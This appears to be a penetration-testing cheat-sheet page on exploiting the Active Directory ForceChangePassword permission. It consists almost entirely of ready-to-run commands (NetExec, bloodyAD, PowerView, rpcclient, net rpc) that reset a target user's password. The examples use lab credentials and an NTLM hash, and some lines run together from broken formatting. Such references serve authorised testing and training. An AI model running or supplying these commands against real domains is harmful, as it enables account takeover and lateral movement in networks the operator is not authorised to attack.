ForceChangePassword
Exploitation
nxc smb <target> -u <user> -p <pass> -M change-password -o USER=blake NEWPASS=Password123! # Plaintext credentials
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password winrm_svc 'Password123!'
# NTLM hash
bloodyAD --host 172.16.1.15 -d bloody.local -u jane.doe -p :70016778cb0524c799ac25b439bd6a31 set password <target-user> <pass>net user <user> <pass> /domain# Create a PSCredential object for the current user
$SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
# Set the password for the target user
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
# Import powerview
Import-Module .\PowerView.ps1
# Change the user's password
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verboserpcclient -U <USER> <IP>
> setuserinfo2 <USER> 23 'ComplexP4ssw0rd!'
# OR
> chgpasswd3 <USER> <OLDPASS> <NEWPASS>
net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"Resources
Last updated
Was this helpful?